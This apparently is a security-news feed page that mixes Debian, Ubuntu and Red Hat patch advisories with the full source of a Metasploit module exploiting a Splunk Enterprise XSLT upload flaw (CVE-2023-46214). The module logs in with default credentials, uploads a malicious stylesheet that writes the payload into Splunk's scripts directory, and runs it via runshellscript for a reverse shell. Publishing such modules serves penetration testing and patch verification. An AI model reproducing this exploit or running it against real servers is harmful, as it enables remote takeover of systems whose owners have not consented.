Debian Linux Security Advisory 5574-1 - Reginaldo Silva discovered two security vulnerabilities in LibreOffice, which could result in the execution of arbitrary scripts or Gstreamer plugins when opening a malformed file.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5574-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffDecember 11, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : libreofficeCVE ID         : CVE-2023-6185 CVE-2023-6186Reginaldo Silva discovered two security vulnerabilities in LibreOffice,which could result in the execution of arbitrary scripts or Gstreamerplugins when opening a malformed file.For the oldstable distribution (bullseye), these problems have been fixedin version 1:7.0.4-4+deb11u8.For the stable distribution (bookworm), these problems have been fixed inversion 4:7.4.7-1+deb12u1.We recommend that you upgrade your libreoffice packages.For the detailed security status of libreoffice please refer toits security tracker page at:https://security-tracker.debian.org/tracker/libreofficeFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmV3VjIACgkQEMKTtsN8TjbwORAAuB60r1xUa5p57zhnUoQUsbnl/TvmwcHNX9mL8AgXgwN2ni0j5YdwpVbPlAuMHf/LaoHrOeHQM+rxV9ATErW28I7hHc2Iyys9nUVv8vKwqhu5U1bTloNUIH4tUcqxZS49ydLgAV6YqcycPJZMXQBq7N4rcWLf0oIS+3aR3ZW1bPcydOQuLUe9eTT19V8hSpn3w58xKn/f9kfhvCW4xjm8TICMqmHGFznUgr2zUvFIIL4jlQyWIOtC8vcvX/PGr5hCVOiUeFgnGltiEe6KKJoVuBzrO1FDnewVetsqzqUlWzJ4djyMiKn0rFDnvoo0DNA1HO32jQi1KNDmPYSyRr5h3VneYJSAfUdpW3Q5pX2KxaCgzKGLV58rr+qyfzEd9Z2DqCP9tiBYZmzFQRQ7WsTHiKHV1gKD+jTVO0thpGAZvh5XLS5JBs7FnrlVx4DCaXQLkLhshv9dsevSq2ssyzcfhUCuvA5m+tbXeZGmukulwH70sUZSCj2Uz7bNniUWUfu/kM/Y8SmynZYvNO0+daVAn32EY7xXmnTvNykRRuXDkL0r7mE4UXLfbWPisEZbANWHJGWeVT3Ucbroko66UMnygl/0TIzqZifo3wJTBEEVExmVlvunsnnsdl0xZPm2DUMhs/3T5xd0nP0ySCzM1BsF302PocN+I9M/LkaMhk6/X0U==yhb9-----END PGP SIGNATURE-----

Debian Security Advisory 5574-1

This Metasploit module exploits a remote code execution vulnerability in Splunk Enterprise. The affected versions include 9.0.x before 9.0.7 and 9.1.x before 9.1.2. The exploitation process leverages a weakness in the XSLT transformation functionality of Splunk. Successful exploitation requires valid credentials, typically admin:changeme by default. The exploit involves uploading a malicious XSLT file to the target system. This file, when processed by the vulnerable Splunk server, leads to the execution of arbitrary code. The module then utilizes the runshellscript capability in Splunk to execute the payload, which can be tailored to establish a reverse shell. This provides the attacker with remote control over the compromised Splunk instance. The module is designed to work seamlessly, ensuring successful exploitation under the right conditions.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Splunk Authenticated XSLT Upload RCE',        'Description' => %q{          This Metasploit module exploits a Remote Code Execution (RCE) vulnerability in Splunk Enterprise.          The affected versions include 9.0.x before 9.0.7 and 9.1.x before 9.1.2. The exploitation process leverages          a weakness in the XSLT transformation functionality of Splunk. Successful exploitation requires valid          credentials, typically 'admin:changeme' by default.          The exploit involves uploading a malicious XSLT file to the target system. This file, when processed by the          vulnerable Splunk server, leads to the execution of arbitrary code. The module then utilizes the 'runshellscript'          capability in Splunk to execute the payload, which can be tailored to establish a reverse shell. This provides          the attacker with remote control over the compromised Splunk instance. The module is designed to work          seamlessly, ensuring successful exploitation under the right conditions.        },        'Author' => [          'nathan', # Writeup and PoC          'Valentin Lobstein', # Metasploit module          'h00die', # Assistance in module development        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2023-46214'],          ['URL', 'https://github.com/nathan31337/Splunk-RCE-poc'],          ['URL', 'https://advisory.splunk.com/advisories/SVD-2023-1104'], # Vendor Advisory          ['URL', 'https://blog.hrncirik.net/cve-2023-46214-analysis'], # Writeup        ],        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_PHP, ARCH_CMD],        'Targets' => [['Automatic', {}]],        'DisclosureDate' => '2023-11-28',        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 8000        },        'Privileged' => false,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options(      [        OptString.new('USERNAME', [true, 'Username for Splunk', 'admin']),        OptString.new('PASSWORD', [true, 'Password for Splunk', 'changeme']),        OptString.new('RANDOM_FILENAME', [false, 'Random filename with 8 characters', Rex::Text.rand_text_alpha(8)]),      ]    )  end  def exploit    cookie_string ||= authenticate    unless cookie_string      fail_with(Failure::NoAccess, 'Authentication failed')    end    sleep(0.3)    csrf_token, updated_cookie_string = fetch_csrf_token(cookie_string)    unless csrf_token      fail_with(Failure::NoAccess, 'Failed to obtain CSRF token')    end    sleep(0.3)    malicious_xsl = generate_malicious_xsl    text_value = upload_malicious_file(malicious_xsl, csrf_token, updated_cookie_string)    unless text_value      fail_with(Failure::Unknown, 'File upload failed')    end    sleep(0.3)    jsid = get_job_search_id(csrf_token, updated_cookie_string)    unless jsid      fail_with(Failure::Unknown, 'Creating job failed')    end    sleep(0.3)    unless trigger_xslt_transform(jsid, text_value, updated_cookie_string)      fail_with(Failure::Unknown, 'XSLT Transform failed')    end    sleep(0.3)    unless trigger_payload(jsid, csrf_token, updated_cookie_string)      fail_with(Failure::Unknown, 'Failed to execute reverse shell')    end  end  def check    unless splunk?      return CheckCode::Unknown('Target does not appear to be a Splunk instance')    end    begin      cookie_string = authenticate    rescue RuntimeError      cookie_string = nil    end    unless cookie_string      return CheckCode::Detected('The target is Splunk but authentication failed')    end    version = get_version_authenticated(cookie_string)    return CheckCode::Detected('Unable to determine Splunk version') unless version    if version.between?(Rex::Version.new('9.0.0'), Rex::Version.new('9.0.6')) ||       version.between?(Rex::Version.new('9.1.0'), Rex::Version.new('9.1.1'))      return CheckCode::Appears("Exploitable version found: #{version}")    end    CheckCode::Safe("Non-vulnerable version found: #{version}")  end  def trigger_payload(jsid, csrf_token, cookie_string)    return nil unless jsid && csrf_token    runshellscript_url = normalize_uri(target_uri.path, 'en-US', 'splunkd', '__raw', 'servicesNS', datastore['USERNAME'], 'search', 'search', 'jobs')    runshellscript_data = {      'search' => "|runshellscript \"#{datastore['RANDOM_FILENAME']}.sh\" \"\" \"\" \"\" \"\" \"\" \"\" \"\" \"#{jsid}\""    }    upload_headers = {      'X-Requested-With' => 'XMLHttpRequest',      'X-Splunk-Form-Key' => csrf_token,      'Cookie' => cookie_string    }    print_status("Executing payload at #{runshellscript_url}")    res = send_request_cgi(      'uri' => runshellscript_url,      'method' => 'POST',      'vars_post' => runshellscript_data,      'headers' => upload_headers    )    unless res      print_error('Failed to execute payload: No response received')      return nil    end    if res.code == 201      print_good('Payload executed successfully')      return true    end    print_error("Failed to execute payload: Server returned status code #{res.code}")    return nil  end  def trigger_xslt_transform(jsid, text_value, cookie_string)    return nil unless jsid && text_value    exploit_endpoint = normalize_uri(target_uri.path, 'en-US', 'api', 'search', 'jobs', jsid, 'results')    exploit_endpoint << "?xsl=/opt/splunk/var/run/splunk/dispatch/#{text_value}/#{datastore['RANDOM_FILENAME']}.xsl"    xslt_headers = {      'X-Splunk-Module' => 'Splunk.Module.DispatchingModule',      'Connection' => 'close',      'Upgrade-Insecure-Requests' => '1',      'Accept-Language' => 'en-US,en;q=0.5',      'Accept-Encoding' => 'gzip, deflate',      'X-Requested-With' => 'XMLHttpRequest',      'Cookie' => cookie_string    }    print_status("Triggering XSLT transformation at #{exploit_endpoint}")    res = send_request_cgi(      'uri' => exploit_endpoint,      'method' => 'GET',      'headers' => xslt_headers    )    unless res      print_error('Failed to trigger XSLT transformation: No response received')      return nil    end    if res.code == 200      print_good('XSLT transformation triggered successfully')      return true    end    print_error("Failed to trigger XSLT transformation: Server returned status code #{res.code}")    return nil  end  def generate_malicious_xsl    encoded_payload = Rex::Text.html_encode(payload.encoded)    xsl_template = <<~XSL      <?xml version="1.0" encoding="UTF-8"?>      <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:exsl="http://exslt.org/common" extension-element-prefixes="exsl">        <xsl:template match="/">          <exsl:document href="/opt/splunk/bin/scripts/#{datastore['RANDOM_FILENAME']}.sh" method="text">            <xsl:text>#{encoded_payload}</xsl:text>          </exsl:document>        </xsl:template>      </xsl:stylesheet>    XSL    xsl_template  end  def get_job_search_id(csrf_token, cookie_string)    return nil unless csrf_token    jsid_url = normalize_uri(target_uri.path, 'en-US', 'splunkd', '__raw', 'servicesNS', datastore['USERNAME'], 'search', 'search', 'jobs')    upload_headers = {      'X-Requested-With' => 'XMLHttpRequest',      'X-Splunk-Form-Key' => csrf_token,      'Cookie' => cookie_string    }    jsid_data = {      'search' => '|search test|head 1'    }    print_status("Sending job search request to #{jsid_url}")    res = send_request_cgi(      'uri' => jsid_url,      'method' => 'POST',      'vars_post' => jsid_data,      'headers' => upload_headers,      'vars_get' => { 'output_mode' => 'json' }    )    unless res      print_error('Failed to initiate job search: No response received')      return nil    end    jsid = res.get_json_document['sid']    return jsid if jsid  end  def upload_malicious_file(file_content, csrf_token, cookie_string)    unless csrf_token      print_error('CSRF token not found')      return nil    end    post_data = Rex::MIME::Message.new    post_data.add_part(file_content, 'application/xslt+xml', nil, "form-data; name=\"spl-file\"; filename=\"#{datastore['RANDOM_FILENAME']}.xsl\"")    upload_headers = {      'Accept' => 'text/javascript, text/html, application/xml, text/xml, */*',      'X-Requested-With' => 'XMLHttpRequest',      'X-Splunk-Form-Key' => csrf_token,      'Cookie' => cookie_string    }    upload_url = normalize_uri(target_uri.path, 'en-US', 'splunkd', '__upload', 'indexing', 'preview')    res = send_request_cgi(      'uri' => upload_url,      'method' => 'POST',      'data' => post_data.to_s,      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",      'headers' => upload_headers,      'vars_get' => {        'output_mode' => 'json',        'props.NO_BINARY_CHECK' => 1,        'input.path' => "#{datastore['RANDOM_FILENAME']}.xsl"      }    )    unless res      print_error('Malicious file upload failed: No response received')      return nil    end    if res.headers['Content-Type'].include?('application/json')      response_data = res.get_json_document    else      print_error('Response is not in JSON format')      return nil    end    if response_data.empty?      print_error('Failed to parse JSON or received empty JSON')      return nil    end    if response_data['messages'] && !response_data['messages'].empty?      text_value = response_data.dig('messages', 0, 'text')      if text_value.include?('concatenate')        print_error('Server responded with an error: concatenate found in the response')        return nil      end      print_good('Malicious file uploaded successfully')      return text_value    end    print_error('Server did not return a valid "messages" field')    return nil  end  def fetch_csrf_token(cookie_string)    print_status('Extracting CSRF token from cookies')    csrf_token_match = cookie_string.match(/splunkweb_csrf_token_8000=([^;]+)/)    if csrf_token_match      csrf_token = csrf_token_match[1]      print_good("CSRF token successfully extracted: #{csrf_token}")      en_us_url = normalize_uri(target_uri.path, 'en-US', 'app', 'launcher', 'home')      res = send_request_cgi({        'method' => 'GET',        'uri' => en_us_url,        'cookie' => cookie_string      })      updated_cookie_string = cookie_string      if res && res.code == 200        new_cookies = res.get_cookies        updated_cookie_string += new_cookies      end      return [csrf_token, updated_cookie_string]    end    fail_with(Failure::NotFound, 'CSRF token not found in cookies')  end  def get_version_authenticated(cookie_string)    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, '/en-US/splunkd/__raw/services/authentication/users/', datastore['USERNAME']),      'vars_get' => {        'output_mode' => 'json'      },      'headers' => {        'Cookie' => cookie_string      }    })    return nil unless res&.code == 200    body = res.get_json_document    Rex::Version.new(body.dig('generator', 'version'))  end  def splunk?    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, '/en-US/account/login')    })    return true if res&.body =~ /Splunk/    false  end  def authenticate    login_url = normalize_uri(target_uri.path, 'en-US', 'account', 'login')    res = send_request_cgi({      'method' => 'GET',      'uri' => login_url    })    unless res      fail_with(Failure::Unreachable, 'No response received for authentication request')    end    cval_value = res.get_cookies.match(/cval=([^;]*)/)[1]    unless cval_value      fail_with(Failure::UnexpectedReply, 'Failed to retrieve the cval cookie for authentication')    end    auth_payload = {      'username' => datastore['USERNAME'],      'password' => datastore['PASSWORD'],      'cval' => cval_value,      'set_has_logged_in' => 'false'    }    res = send_request_cgi({      'method' => 'POST',      'uri' => login_url,      'cookie' => res.get_cookies,      'vars_post' => auth_payload    })    unless res && res.code == 200      fail_with(Failure::NoAccess, 'Failed to authenticate on the Splunk instance')    end    print_good('Successfully authenticated on the Splunk instance')    res.get_cookies  endend

Splunk XSLT Upload Remote Code Execution

Ubuntu Security Notice 6550-1 - It was discovered that Smarty, that is integrated in the PostfixAdmin code, was not properly sanitizing user input when generating templates. An attacker could, through PHP injection, possibly use this issue to execute arbitrary code. It was discovered that Moment.js, that is integrated in the PostfixAdmin code, was using an inefficient parsing algorithm when processing date strings in the RFC 2822 standard. An attacker could possibly use this issue to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6550-1December 12, 2023postfixadmin vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS (Available with Ubuntu Pro)- Ubuntu 20.04 LTS (Available with Ubuntu Pro)- Ubuntu 18.04 LTS (Available with Ubuntu Pro)Summary:Several security issues were fixed in PostfixAdmin.Software Description:- postfixadmin: Virtual mail hosting interface for PostfixDetails:It was discovered that Smarty, that is integrated in the PostfixAdmincode, was not properly sanitizing user input when generating templates. Anattacker could, through PHP injection, possibly use this issue to executearbitrary code. (CVE-2022-29221)It was discovered that Moment.js, that is integrated in the PostfixAdmincode, was using an inefficient parsing algorithm when processing datestrings in the RFC 2822 standard. An attacker could possibly use thisissue to cause a denial of service. (CVE-2022-31129)It was discovered that Smarty, that is integrated in the PostfixAdmincode, was not properly escaping JavaScript code. An attacker couldpossibly use this issue to conduct cross-site scripting attacks (XSS).(CVE-2023-28447)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS (Available with Ubuntu Pro):postfixadmin 3.3.10-2ubuntu0.1~esm1Ubuntu 20.04 LTS (Available with Ubuntu Pro):postfixadmin 3.2.1-3ubuntu0.1~esm1Ubuntu 18.04 LTS (Available with Ubuntu Pro):postfixadmin 3.0.2-2ubuntu0.1~esm1In general, a standard system update will make all the necessary changes.References:https://ubuntu.com/security/notices/USN-6550-1CVE-2022-29221, CVE-2022-31129, CVE-2023-28447

Ubuntu Security Notice USN-6550-1

Red Hat Security Advisory 2023-7730-03 - An update for tracker-miners is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7730.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: tracker-miners security updateAdvisory ID:        RHSA-2023:7730-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7730Issue date:         2023-12-12Revision:           03CVE Names:          CVE-2023-5557====================================================================Summary: An update for tracker-miners is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Tracker is a powerful desktop-neutral first class object database, tag/metadata database and search tool. This package contains various miners and metadata extractors for tracker.Security Fix(es):* tracker-miners: sandbox escape (CVE-2023-5557)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-5557References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2243096

Red Hat Security Advisory 2023-7730-03

Red Hat Security Advisory 2023-7725-03 - Updated images are now available for Red Hat Advanced Cluster Security. The updated image includes bug and security fixes.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7725.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: RHACS 4.3 enhancement and security update  
Advisory ID:        RHSA-2023:7725-03  
Product:            Red Hat Advanced Cluster Security for Kubernetes  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7725  
Issue date:         2023-12-11  
Revision:           03  
CVE Names:          CVE-2022-39222  
====================================================================

Summary: 

Updated images are now available for Red Hat Advanced Cluster Security. The updated image includes bug and security fixes.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

This release of RHACS 4.3.1 provides the following bug fixes:

* Fixed an issue where a user could not log in if a role mapped to the user did not have at least `read` access for the `Access` permission.

* Fixed an issue with editing user-defined vulnerability reports in version 4.3 that were created in a previous version and linked to a specific report scope. When editing the report in version 4.3, the report scope reference was missing, and the system returned an error message.

* Updated and removed golang dependencies to address reported vulnerabilities, including false positives.

It provides the following security fix(es):

* dexidp: gaining access to applications accepting that token (CVE-2022-39222)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

CVEs:

CVE-2022-39222

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://docs.openshift.com/acs/4.3/release_notes/43-release-notes.html  
https://bugzilla.redhat.com/show_bug.cgi?id=2253625  
https://issues.redhat.com/browse/ROX-20850  
https://issues.redhat.com/browse/ROX-20927  
https://issues.redhat.com/browse/ROX-20941  
https://issues.redhat.com/browse/ROX-21106

Red Hat Security Advisory 2023-7725-03

Red Hat Security Advisory 2023-7716-03 - An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 8. Issues addressed include a code execution vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7716.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: webkit2gtk3 security updateAdvisory ID:        RHSA-2023:7716-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7716Issue date:         2023-12-11Revision:           03CVE Names:          CVE-2023-42917====================================================================Summary: An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform.Security Fix(es):* webkitgtk: Arbitrary Remote Code Execution (CVE-2023-42917)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-42917References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2253058

Red Hat Security Advisory 2023-7716-03

Red Hat Security Advisory 2023-7715-03 - An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 9. Issues addressed include a code execution vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7715.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: webkit2gtk3 security updateAdvisory ID:        RHSA-2023:7715-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7715Issue date:         2023-12-11Revision:           03CVE Names:          CVE-2023-42917====================================================================Summary: An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform.Security Fix(es):* webkitgtk: Arbitrary Remote Code Execution (CVE-2023-42917)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-42917References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2253058

Red Hat Security Advisory 2023-7715-03

Red Hat Security Advisory 2023-7714-03 - An update for the postgresql:12 module is now available for Red Hat Enterprise Linux 8. Issues addressed include integer overflow and remote SQL injection vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7714.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: postgresql:12 security update  
Advisory ID:        RHSA-2023:7714-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7714  
Issue date:         2023-12-11  
Revision:           03  
CVE Names:          CVE-2023-5868  
====================================================================

Summary: 

An update for the postgresql:12 module is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

PostgreSQL is an advanced object-relational database management system (DBMS).

Security Fix(es):

* postgresql: Buffer overrun from integer overflow in array modification (CVE-2023-5869)

* postgresql: Memory disclosure in aggregate function calls (CVE-2023-5868)

* postgresql: extension script @substitutions@ within quoting allow SQL injection (CVE-2023-39417)

* postgresql: Role pg_signal_backend can signal certain superuser processes. (CVE-2023-5870)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-5868

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2228111  
https://bugzilla.redhat.com/show_bug.cgi?id=2247168  
https://bugzilla.redhat.com/show_bug.cgi?id=2247169  
https://bugzilla.redhat.com/show_bug.cgi?id=2247170

Red Hat Security Advisory 2023-7714-03

Red Hat Security Advisory 2023-7713-03 - An update for tracker-miners is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7713.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: tracker-miners security updateAdvisory ID:        RHSA-2023:7713-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7713Issue date:         2023-12-11Revision:           03CVE Names:          CVE-2023-5557====================================================================Summary: An update for tracker-miners is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Tracker is a powerful desktop-neutral first class object database, tag/metadata database and search tool. This package contains various miners and metadata extractors for tracker.Security Fix(es):* tracker-miners: sandbox escape (CVE-2023-5557)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-5557References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2243096

Red Hat Security Advisory 2023-7713-03

Red Hat Security Advisory 2023-7712-03 - An update for tracker-miners is now available for Red Hat Enterprise Linux 9.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7712.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: tracker-miners security updateAdvisory ID:        RHSA-2023:7712-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7712Issue date:         2023-12-11Revision:           03CVE Names:          CVE-2023-5557====================================================================Summary: An update for tracker-miners is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Tracker is a powerful desktop-neutral first class object database, tag/metadata database and search tool. This package contains various miners and metadata extractors for tracker.Security Fix(es):* tracker-miners: sandbox escape (CVE-2023-5557)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-5557References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2243096

Tag

#js